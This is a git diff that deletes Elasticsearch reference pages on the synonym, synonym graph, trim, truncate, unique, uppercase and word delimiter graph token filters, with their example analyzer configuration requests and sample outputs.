a/docs/reference/analysis/tokenfilters/synonym-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,198 +0,0 @@ -[[analysis-synonym-graph-tokenfilter]] -=== Synonym graph token filter -++++ -Synonym graph -++++ - -The `synonym_graph` token filter allows to easily handle synonyms, -including multi-word synonyms correctly during the analysis process. - -In order to properly handle multi-word synonyms this token filter -creates a <> during processing. For more -information on this topic and its various complexities, please read the -http://blog.mikemccandless.com/2012/04/lucenes-tokenstreams-are-actually.html[Lucene's TokenStreams are actually graphs] blog post. - -["NOTE",id="synonym-graph-index-note"] -=============================== -This token filter is designed to be used as part of a search analyzer -only. If you want to apply synonyms during indexing please use the -standard <>. -=============================== - -Synonyms are configured using a configuration file. -Here is an example: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "search_synonyms": { - "tokenizer": "whitespace", - "filter": [ "graph_synonyms" ] - } - }, - "filter": { - "graph_synonyms": { - "type": "synonym_graph", - "synonyms_path": "analysis/synonym.txt" - } - } - } - } - } -} --------------------------------------------------- - -The above configures a `search_synonyms` filter, with a path of -`analysis/synonym.txt` (relative to the `config` location). The -`search_synonyms` analyzer is then configured with the filter. - -Additional settings are: - -* `expand` (defaults to `true`). -* `lenient` (defaults to `false`). If `true` ignores exceptions while parsing the synonym configuration. It is important -to note that only those synonym rules which cannot get parsed are ignored. 
For instance consider the following request: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "standard", - "filter": [ "my_stop", "synonym_graph" ] - } - }, - "filter": { - "my_stop": { - "type": "stop", - "stopwords": [ "bar" ] - }, - "synonym_graph": { - "type": "synonym_graph", - "lenient": true, - "synonyms": [ "foo, bar => baz" ] - } - } - } - } - } -} --------------------------------------------------- - -With the above request the word `bar` gets skipped but a mapping `foo => baz` is still added. However, if the mapping -being added was `foo, baz => bar` nothing would get added to the synonym list. This is because the target word for the -mapping is itself eliminated because it was a stop word. Similarly, if the mapping was "bar, foo, baz" and `expand` was -set to `false` no mapping would get added as when `expand=false` the target mapping is the first word. However, if -`expand=true` then the mappings added would be equivalent to `foo, baz => foo, baz` i.e, all mappings other than the -stop word. - -[discrete] -[[synonym-graph-tokenizer-ignore_case-deprecated]] -==== `tokenizer` and `ignore_case` are deprecated - -The `tokenizer` parameter controls the tokenizers that will be used to -tokenize the synonym, this parameter is for backwards compatibility for indices that created before 6.0.. -The `ignore_case` parameter works with `tokenizer` parameter only. - -Two synonym formats are supported: Solr, WordNet. - -[discrete] -==== Solr synonyms - -The following is a sample format of the file: - -[source,synonyms] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/synonym.txt[] --------------------------------------------------- - -You can also define synonyms for the filter directly in the -configuration file (note use of `synonyms` instead of `synonyms_path`): - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym_graph", - "synonyms": [ - "lol, laughing out loud", - "universe, cosmos" - ] - } - } - } - } - } -} --------------------------------------------------- - -However, it is recommended to define large synonyms set in a file using -`synonyms_path`, because specifying them inline increases cluster size unnecessarily. - -[discrete] -==== WordNet synonyms - -Synonyms based on https://wordnet.princeton.edu/[WordNet] format can be -declared using `format`: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym_graph", - "format": "wordnet", - "synonyms": [ - "s(100000001,1,'abstain',v,1,0).", - "s(100000001,2,'refrain',v,1,0).", - "s(100000001,3,'desist',v,1,0)." - ] - } - } - } - } - } -} --------------------------------------------------- - -Using `synonyms_path` to define WordNet synonyms in a file is supported -as well. - -[discrete] -==== Parsing synonym files - -Elasticsearch will use the token filters preceding the synonym filter -in a tokenizer chain to parse the entries in a synonym file. So, for example, if a -synonym filter is placed after a stemmer, then the stemmer will also be applied -to the synonym entries. Because entries in the synonym map cannot have stacked -positions, some token filters may cause issues here. 
Token filters that produce -multiple versions of a token may choose which version of the token to emit when -parsing synonyms, e.g. `asciifolding` will only produce the folded version of the -token. Others, e.g. `multiplexer`, `word_delimiter_graph` or `ngram` will throw an -error. - -If you need to build analyzers that include both multi-token filters and synonym -filters, consider using the <> filter, -with the multi-token filters in one branch and the synonym filter in the other. - -WARNING: The synonym rules should not contain words that are removed by -a filter that appears after in the chain (a `stop` filter for instance). -Removing a term from a synonym rule breaks the matching at query time. - diff --git a/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc deleted file mode 100644 index 77cf7f371df..00000000000 --- a/docs/reference/analysis/tokenfilters/synonym-tokenfilter.asciidoc +++ /dev/null @@ -1,184 +0,0 @@ -[[analysis-synonym-tokenfilter]] -=== Synonym token filter -++++ -Synonym -++++ - -The `synonym` token filter allows to easily handle synonyms during the -analysis process. Synonyms are configured using a configuration file. -Here is an example: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "whitespace", - "filter": [ "synonym" ] - } - }, - "filter": { - "synonym": { - "type": "synonym", - "synonyms_path": "analysis/synonym.txt" - } - } - } - } - } -} --------------------------------------------------- - -The above configures a `synonym` filter, with a path of -`analysis/synonym.txt` (relative to the `config` location). The -`synonym` analyzer is then configured with the filter. - -This filter tokenizes synonyms with whatever tokenizer and token filters -appear before it in the chain. - -Additional settings are: - -* `expand` (defaults to `true`). -* `lenient` (defaults to `false`). If `true` ignores exceptions while parsing the synonym configuration. It is important -to note that only those synonym rules which cannot get parsed are ignored. For instance consider the following request: - - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "synonym": { - "tokenizer": "standard", - "filter": [ "my_stop", "synonym" ] - } - }, - "filter": { - "my_stop": { - "type": "stop", - "stopwords": [ "bar" ] - }, - "synonym": { - "type": "synonym", - "lenient": true, - "synonyms": [ "foo, bar => baz" ] - } - } - } - } - } -} --------------------------------------------------- - -With the above request the word `bar` gets skipped but a mapping `foo => baz` is still added. However, if the mapping -being added was `foo, baz => bar` nothing would get added to the synonym list. This is because the target word for the -mapping is itself eliminated because it was a stop word. Similarly, if the mapping was "bar, foo, baz" and `expand` was -set to `false` no mapping would get added as when `expand=false` the target mapping is the first word. However, if -`expand=true` then the mappings added would be equivalent to `foo, baz => foo, baz` i.e, all mappings other than the -stop word. 
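-
-The effect of `expand` on equivalence rules can be seen directly. The following
-request is a minimal sketch (the index name and the synonym rule are only
-illustrative): it registers a `synonym` filter with `expand` set to `false`, so
-the rule `universe, cosmos` rewrites `cosmos` to the first term in the rule,
-`universe`, at analysis time. With the default `expand` of `true`, either term
-would instead be expanded to both terms.
-
-[source,console]
---------------------------------------------------
-PUT /test_index_no_expand
-{
-  "settings": {
-    "index": {
-      "analysis": {
-        "analyzer": {
-          "synonym": {
-            "tokenizer": "whitespace",
-            "filter": [ "synonym" ]
-          }
-        },
-        "filter": {
-          "synonym": {
-            "type": "synonym",
-            "expand": false,
-            "synonyms": [ "universe, cosmos" ]
-          }
-        }
-      }
-    }
-  }
-}
--------------------------------------------------- 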
- - -[discrete] -[[synonym-tokenizer-ignore_case-deprecated]] -==== `tokenizer` and `ignore_case` are deprecated - -The `tokenizer` parameter controls the tokenizers that will be used to -tokenize the synonym, this parameter is for backwards compatibility for indices that created before 6.0. -The `ignore_case` parameter works with `tokenizer` parameter only. - -Two synonym formats are supported: Solr, WordNet. - -[discrete] -==== Solr synonyms - -The following is a sample format of the file: - -[source,synonyms] --------------------------------------------------- -include::{es-test-dir}/cluster/config/analysis/synonym.txt[] --------------------------------------------------- - -You can also define synonyms for the filter directly in the -configuration file (note use of `synonyms` instead of `synonyms_path`): - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym", - "synonyms": [ - "i-pod, i pod => ipod", - "universe, cosmos" - ] - } - } - } - } - } -} --------------------------------------------------- - -However, it is recommended to define large synonyms set in a file using -`synonyms_path`, because specifying them inline increases cluster size unnecessarily. - -[discrete] -==== WordNet synonyms - -Synonyms based on https://wordnet.princeton.edu/[WordNet] format can be -declared using `format`: - -[source,console] --------------------------------------------------- -PUT /test_index -{ - "settings": { - "index": { - "analysis": { - "filter": { - "synonym": { - "type": "synonym", - "format": "wordnet", - "synonyms": [ - "s(100000001,1,'abstain',v,1,0).", - "s(100000001,2,'refrain',v,1,0).", - "s(100000001,3,'desist',v,1,0)." - ] - } - } - } - } - } -} --------------------------------------------------- - -Using `synonyms_path` to define WordNet synonyms in a file is supported -as well. - -[discrete] -=== Parsing synonym files - -Elasticsearch will use the token filters preceding the synonym filter -in a tokenizer chain to parse the entries in a synonym file. So, for example, if a -synonym filter is placed after a stemmer, then the stemmer will also be applied -to the synonym entries. Because entries in the synonym map cannot have stacked -positions, some token filters may cause issues here. Token filters that produce -multiple versions of a token may choose which version of the token to emit when -parsing synonyms, e.g. `asciifolding` will only produce the folded version of the -token. Others, e.g. `multiplexer`, `word_delimiter_graph` or `ngram` will throw an -error. - -If you need to build analyzers that include both multi-token filters and synonym -filters, consider using the <> filter, -with the multi-token filters in one branch and the synonym filter in the other. diff --git a/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc deleted file mode 100644 index b69f71b7bdc..00000000000 --- a/docs/reference/analysis/tokenfilters/trim-tokenfilter.asciidoc +++ /dev/null @@ -1,113 +0,0 @@ -[[analysis-trim-tokenfilter]] -=== Trim token filter -++++ -Trim -++++ - -Removes leading and trailing whitespace from each token in a stream. While this -can change the length of a token, the `trim` filter does _not_ change a token's -offsets. 
- -The `trim` filter uses Lucene's -https://lucene.apache.org/core/{lucene_version_path}/analyzers-common/org/apache/lucene/analysis/miscellaneous/TrimFilter.html[TrimFilter]. - -[TIP] -==== -Many commonly used tokenizers, such as the -<> or -<> tokenizer, remove whitespace by -default. When using these tokenizers, you don't need to add a separate `trim` -filter. -==== - -[[analysis-trim-tokenfilter-analyze-ex]] -==== Example - -To see how the `trim` filter works, you first need to produce a token -containing whitespace. - -The following <> request uses the -<> tokenizer to produce a token for -`" fox "`. - -[source,console] ----- -GET _analyze -{ - "tokenizer" : "keyword", - "text" : " fox " -} ----- - -The API returns the following response. Note the `" fox "` token contains the -original text's whitespace. Note that despite changing the token's length, the -`start_offset` and `end_offset` remain the same. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": " fox ", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - } - ] -} ----- - -To remove the whitespace, add the `trim` filter to the previous analyze API -request. - -[source,console] ----- -GET _analyze -{ - "tokenizer" : "keyword", - "filter" : ["trim"], - "text" : " fox " -} ----- - -The API returns the following response. The returned `fox` token does not -include any leading or trailing whitespace. - -[source,console-result] ----- -{ - "tokens": [ - { - "token": "fox", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - } - ] -} ----- - -[[analysis-trim-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the `trim` -filter to configure a new <>. - -[source,console] ----- -PUT trim_example -{ - "settings": { - "analysis": { - "analyzer": { - "keyword_trim": { - "tokenizer": "keyword", - "filter": [ "trim" ] - } - } - } - } -} ----- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc deleted file mode 100644 index a77387d5fd4..00000000000 --- a/docs/reference/analysis/tokenfilters/truncate-tokenfilter.asciidoc +++ /dev/null @@ -1,148 +0,0 @@ -[[analysis-truncate-tokenfilter]] -=== Truncate token filter -++++ -Truncate -++++ - -Truncates tokens that exceed a specified character limit. This limit defaults to -`10` but can be customized using the `length` parameter. - -For example, you can use the `truncate` filter to shorten all tokens to -`3` characters or fewer, changing `jumping fox` to `jum fox`. - -This filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/TruncateTokenFilter.html[TruncateTokenFilter]. 
- -[[analysis-truncate-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `truncate` filter -to shorten tokens that exceed 10 characters in -`the quinquennial extravaganza carried on`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["truncate"], - "text" : "the quinquennial extravaganza carried on" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ the, quinquenni, extravagan, carried, on ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "quinquenni", - "start_offset" : 4, - "end_offset" : 16, - "type" : "word", - "position" : 1 - }, - { - "token" : "extravagan", - "start_offset" : 17, - "end_offset" : 29, - "type" : "word", - "position" : 2 - }, - { - "token" : "carried", - "start_offset" : 30, - "end_offset" : 37, - "type" : "word", - "position" : 3 - }, - { - "token" : "on", - "start_offset" : 38, - "end_offset" : 40, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-truncate-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`truncate` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT custom_truncate_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "standard_truncate" : { - "tokenizer" : "standard", - "filter" : ["truncate"] - } - } - } - } -} --------------------------------------------------- - -[[analysis-truncate-tokenfilter-configure-parms]] -==== Configurable parameters - -`length`:: -(Optional, integer) -Character limit for each token. Tokens exceeding this limit are truncated. -Defaults to `10`. - -[[analysis-truncate-tokenfilter-customize]] -==== Customize - -To customize the `truncate` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `truncate` filter, -`5_char_trunc`, that shortens tokens to a `length` of `5` or fewer characters: - -[source,console] --------------------------------------------------- -PUT 5_char_words_example -{ - "settings": { - "analysis": { - "analyzer": { - "lowercase_5_char": { - "tokenizer": "lowercase", - "filter": [ "5_char_trunc" ] - } - }, - "filter": { - "5_char_trunc": { - "type": "truncate", - "length": 5 - } - } - } - } -} --------------------------------------------------- \ No newline at end of file diff --git a/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc deleted file mode 100644 index 5afed11923a..00000000000 --- a/docs/reference/analysis/tokenfilters/unique-tokenfilter.asciidoc +++ /dev/null @@ -1,150 +0,0 @@ -[[analysis-unique-tokenfilter]] -=== Unique token filter -++++ -Unique -++++ - -Removes duplicate tokens from a stream. For example, you can use the `unique` -filter to change `the lazy lazy dog` to `the lazy dog`. - -If the `only_on_same_position` parameter is set to `true`, the `unique` filter -removes only duplicate tokens _in the same position_. 
- -[NOTE] -==== -When `only_on_same_position` is `true`, the `unique` filter works the same as -<> filter. -==== - -[[analysis-unique-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the `unique` filter -to remove duplicate tokens from `the quick fox jumps the lazy fox`: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "whitespace", - "filter" : ["unique"], - "text" : "the quick fox jumps the lazy fox" -} --------------------------------------------------- - -The filter removes duplicated tokens for `the` and `fox`, producing the -following output: - -[source,text] --------------------------------------------------- -[ the, quick, fox, jumps, lazy ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "the", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0 - }, - { - "token" : "quick", - "start_offset" : 4, - "end_offset" : 9, - "type" : "word", - "position" : 1 - }, - { - "token" : "fox", - "start_offset" : 10, - "end_offset" : 13, - "type" : "word", - "position" : 2 - }, - { - "token" : "jumps", - "start_offset" : 14, - "end_offset" : 19, - "type" : "word", - "position" : 3 - }, - { - "token" : "lazy", - "start_offset" : 24, - "end_offset" : 28, - "type" : "word", - "position" : 4 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-unique-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`unique` filter to configure a new <>. - -[source,console] --------------------------------------------------- -PUT custom_unique_example -{ - "settings" : { - "analysis" : { - "analyzer" : { - "standard_truncate" : { - "tokenizer" : "standard", - "filter" : ["unique"] - } - } - } - } -} --------------------------------------------------- - -[[analysis-unique-tokenfilter-configure-parms]] -==== Configurable parameters - -`only_on_same_position`:: -(Optional, Boolean) -If `true`, only remove duplicate tokens in the same position. -Defaults to `false`. - -[[analysis-unique-tokenfilter-customize]] -==== Customize - -To customize the `unique` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a custom `unique` filter with -`only_on_same_position` set to `true`. - -[source,console] --------------------------------------------------- -PUT letter_unique_pos_example -{ - "settings": { - "analysis": { - "analyzer": { - "letter_unique_pos": { - "tokenizer": "letter", - "filter": [ "unique_pos" ] - } - }, - "filter": { - "unique_pos": { - "type": "unique", - "only_on_same_position": true - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc deleted file mode 100644 index 9192a46810a..00000000000 --- a/docs/reference/analysis/tokenfilters/uppercase-tokenfilter.asciidoc +++ /dev/null @@ -1,106 +0,0 @@ -[[analysis-uppercase-tokenfilter]] -=== Uppercase token filter -++++ -Uppercase -++++ - -Changes token text to uppercase. For example, you can use the `uppercase` filter -to change `the Lazy DoG` to `THE LAZY DOG`. 
- -This filter uses Lucene's -{lucene-analysis-docs}/core/UpperCaseFilter.html[UpperCaseFilter]. - -[WARNING] -==== -Depending on the language, an uppercase character can map to multiple -lowercase characters. Using the `uppercase` filter could result in the loss of -lowercase character information. - -To avoid this loss but still have a consistent letter case, use the -<> filter instead. -==== - -[[analysis-uppercase-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the default -`uppercase` filter to change the `the Quick FoX JUMPs` to uppercase: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer" : "standard", - "filter" : ["uppercase"], - "text" : "the Quick FoX JUMPs" -} --------------------------------------------------- - -The filter produces the following tokens: - -[source,text] --------------------------------------------------- -[ THE, QUICK, FOX, JUMPS ] --------------------------------------------------- - -///////////////////// -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ - { - "token" : "THE", - "start_offset" : 0, - "end_offset" : 3, - "type" : "", - "position" : 0 - }, - { - "token" : "QUICK", - "start_offset" : 4, - "end_offset" : 9, - "type" : "", - "position" : 1 - }, - { - "token" : "FOX", - "start_offset" : 10, - "end_offset" : 13, - "type" : "", - "position" : 2 - }, - { - "token" : "JUMPS", - "start_offset" : 14, - "end_offset" : 19, - "type" : "", - "position" : 3 - } - ] -} --------------------------------------------------- -///////////////////// - -[[analysis-uppercase-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`uppercase` filter to configure a new -<>. - -[source,console] --------------------------------------------------- -PUT uppercase_example -{ - "settings": { - "analysis": { - "analyzer": { - "whitespace_uppercase": { - "tokenizer": "whitespace", - "filter": [ "uppercase" ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc b/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc deleted file mode 100644 index 2999df6a9a1..00000000000 --- a/docs/reference/analysis/tokenfilters/word-delimiter-graph-tokenfilter.asciidoc +++ /dev/null @@ -1,505 +0,0 @@ -[[analysis-word-delimiter-graph-tokenfilter]] -=== Word delimiter graph token filter -++++ -Word delimiter graph -++++ - -Splits tokens at non-alphanumeric characters. The `word_delimiter_graph` filter -also performs optional token normalization based on a set of rules. By default, -the filter uses the following rules: - -* Split tokens at non-alphanumeric characters. - The filter uses these characters as delimiters. - For example: `Super-Duper` -> `Super`, `Duper` -* Remove leading or trailing delimiters from each token. - For example: `XL---42+'Autocoder'` -> `XL`, `42`, `Autocoder` -* Split tokens at letter case transitions. - For example: `PowerShot` -> `Power`, `Shot` -* Split tokens at letter-number transitions. - For example: `XL500` -> `XL`, `500` -* Remove the English possessive (`'s`) from the end of each token. - For example: `Neil's` -> `Neil` - -The `word_delimiter_graph` filter uses Lucene's -{lucene-analysis-docs}/miscellaneous/WordDelimiterGraphFilter.html[WordDelimiterGraphFilter]. 
- -[TIP] -==== -The `word_delimiter_graph` filter was designed to remove punctuation from -complex identifiers, such as product IDs or part numbers. For these use cases, -we recommend using the `word_delimiter_graph` filter with the -<> tokenizer. - -Avoid using the `word_delimiter_graph` filter to split hyphenated words, such as -`wi-fi`. Because users often search for these words both with and without -hyphens, we recommend using the -<> filter instead. -==== - -[[analysis-word-delimiter-graph-tokenfilter-analyze-ex]] -==== Example - -The following <> request uses the -`word_delimiter_graph` filter to split `Neil's-Super-Duper-XL500--42+AutoCoder` -into normalized tokens using the filter's default rules: - -[source,console] ----- -GET /_analyze -{ - "tokenizer": "keyword", - "filter": [ "word_delimiter_graph" ], - "text": "Neil's-Super-Duper-XL500--42+AutoCoder" -} ----- - -The filter produces the following tokens: - -[source,txt] ----- -[ Neil, Super, Duper, XL, 500, 42, Auto, Coder ] ----- - -//// -[source,console-result] ----- -{ - "tokens": [ - { - "token": "Neil", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "Super", - "start_offset": 7, - "end_offset": 12, - "type": "word", - "position": 1 - }, - { - "token": "Duper", - "start_offset": 13, - "end_offset": 18, - "type": "word", - "position": 2 - }, - { - "token": "XL", - "start_offset": 19, - "end_offset": 21, - "type": "word", - "position": 3 - }, - { - "token": "500", - "start_offset": 21, - "end_offset": 24, - "type": "word", - "position": 4 - }, - { - "token": "42", - "start_offset": 26, - "end_offset": 28, - "type": "word", - "position": 5 - }, - { - "token": "Auto", - "start_offset": 29, - "end_offset": 33, - "type": "word", - "position": 6 - }, - { - "token": "Coder", - "start_offset": 33, - "end_offset": 38, - "type": "word", - "position": 7 - } - ] -} ----- -//// - -[[analysis-word-delimiter-graph-tokenfilter-analyzer-ex]] -==== Add to an analyzer - -The following <> request uses the -`word_delimiter_graph` filter to configure a new -<>. - -[source,console] ----- -PUT /my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "keyword", - "filter": [ "word_delimiter_graph" ] - } - } - } - } -} ----- - -[WARNING] -==== -Avoid using the `word_delimiter_graph` filter with tokenizers that remove -punctuation, such as the <> tokenizer. -This could prevent the `word_delimiter_graph` filter from splitting tokens -correctly. It can also interfere with the filter's configurable parameters, such -as <> or -<>. We -recommend using the <> or -<> tokenizer instead. -==== - -[[word-delimiter-graph-tokenfilter-configure-parms]] -==== Configurable parameters - -[[word-delimiter-graph-tokenfilter-adjust-offsets]] -`adjust_offsets`:: -+ --- -(Optional, Boolean) -If `true`, the filter adjusts the offsets of split or catenated tokens to better -reflect their actual position in the token stream. Defaults to `true`. - -[WARNING] -==== -Set `adjust_offsets` to `false` if your analyzer uses filters, such as the -<> filter, that change the length of tokens -without changing their offsets. Otherwise, the `word_delimiter_graph` filter -could produce tokens with illegal offsets. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-all]] -`catenate_all`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphanumeric -characters separated by non-alphabetic delimiters. 
For example: -`super-duper-xl-500` -> [ **`superduperxl500`**, `super`, `duper`, `xl`, `500` ]. -Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-numbers]] -`catenate_numbers`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of numeric characters -separated by non-alphabetic delimiters. For example: `01-02-03` -> -[ **`010203`**, `01`, `02`, `03` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -[[word-delimiter-graph-tokenfilter-catenate-words]] -`catenate_words`:: -+ --- -(Optional, Boolean) -If `true`, the filter produces catenated tokens for chains of alphabetical -characters separated by non-alphabetic delimiters. For example: `super-duper-xl` --> [ **`superduperxl`**, `super`, `duper`, `xl` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. - -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. - -When used for search analysis, catenated tokens can cause problems for the -<> query and other queries that -rely on token position for matching. Avoid setting this parameter to `true` if -you plan to use these queries. -==== --- - -`generate_number_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only numeric characters in -the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`generate_word_parts`:: -(Optional, Boolean) -If `true`, the filter includes tokens consisting of only alphabetical characters -in the output. If `false`, the filter excludes these tokens from the output. -Defaults to `true`. - -`ignore_keywords`:: -(Optional, Boolean) -If `true`, the filter skips tokens with -a `keyword` attribute of `true`. -Defaults to `false`. - -[[word-delimiter-graph-tokenfilter-preserve-original]] -`preserve_original`:: -+ --- -(Optional, Boolean) -If `true`, the filter includes the original version of any split tokens in the -output. This original version includes non-alphanumeric delimiters. For example: -`super-duper-xl-500` -> [ **`super-duper-xl-500`**, `super`, `duper`, `xl`, -`500` ]. Defaults to `false`. - -[WARNING] -==== -Setting this parameter to `true` produces multi-position tokens, which are not -supported by indexing. 
- -If this parameter is `true`, avoid using this filter in an index analyzer or -use the <> filter after -this filter to make the token stream suitable for indexing. -==== --- - -`protected_words`:: -(Optional, array of strings) -Array of tokens the filter won't split. - -`protected_words_path`:: -+ --- -(Optional, string) -Path to a file that contains a list of tokens the filter won't split. - -This path must be absolute or relative to the `config` location, and the file -must be UTF-8 encoded. Each token in the file must be separated by a line -break. --- - -`split_on_case_change`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter case transitions. For example: -`camelCase` -> [ `camel`, `Case` ]. Defaults to `true`. - -`split_on_numerics`:: -(Optional, Boolean) -If `true`, the filter splits tokens at letter-number transitions. For example: -`j2se` -> [ `j`, `2`, `se` ]. Defaults to `true`. - -`stem_english_possessive`:: -(Optional, Boolean) -If `true`, the filter removes the English possessive (`'s`) from the end of each -token. For example: `O'Neil's` -> [ `O`, `Neil` ]. Defaults to `true`. - -`type_table`:: -+ --- -(Optional, array of strings) -Array of custom type mappings for characters. This allows you to map -non-alphanumeric characters as numeric or alphanumeric to avoid splitting on -those characters. - -For example, the following array maps the plus (`+`) and hyphen (`-`) characters -as alphanumeric, which means they won't be treated as delimiters: - -`[ "+ => ALPHA", "- => ALPHA" ]` - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) --- - -`type_table_path`:: -+ --- -(Optional, string) -Path to a file that contains custom type mappings for characters. This allows -you to map non-alphanumeric characters as numeric or alphanumeric to avoid -splitting on those characters. - -For example, the contents of this file may contain the following: - -[source,txt] ----- -# Map the $, %, '.', and ',' characters to DIGIT -# This might be useful for financial data. -$ => DIGIT -% => DIGIT -. => DIGIT -\\u002C => DIGIT - -# in some cases you might not want to split on ZWJ -# this also tests the case where we need a bigger byte[] -# see https://en.wikipedia.org/wiki/Zero-width_joiner -\\u200D => ALPHANUM ----- - -Supported types include: - -* `ALPHA` (Alphabetical) -* `ALPHANUM` (Alphanumeric) -* `DIGIT` (Numeric) -* `LOWER` (Lowercase alphabetical) -* `SUBWORD_DELIM` (Non-alphanumeric delimiter) -* `UPPER` (Uppercase alphabetical) - -This file path must be absolute or relative to the `config` location, and the -file must be UTF-8 encoded. Each mapping in the file must be separated by a line -break. --- - -[[analysis-word-delimiter-graph-tokenfilter-customize]] -==== Customize - -To customize the `word_delimiter_graph` filter, duplicate it to create the basis -for a new custom token filter. You can modify the filter using its configurable -parameters. - -For example, the following request creates a `word_delimiter_graph` -filter that uses the following rules: - -* Split tokens at non-alphanumeric characters, _except_ the hyphen (`-`) - character. -* Remove leading or trailing delimiters from each token. -* Do _not_ split tokens at letter case transitions. -* Do _not_ split tokens at letter-number transitions. -* Remove the English possessive (`'s`) from the end of each token. 
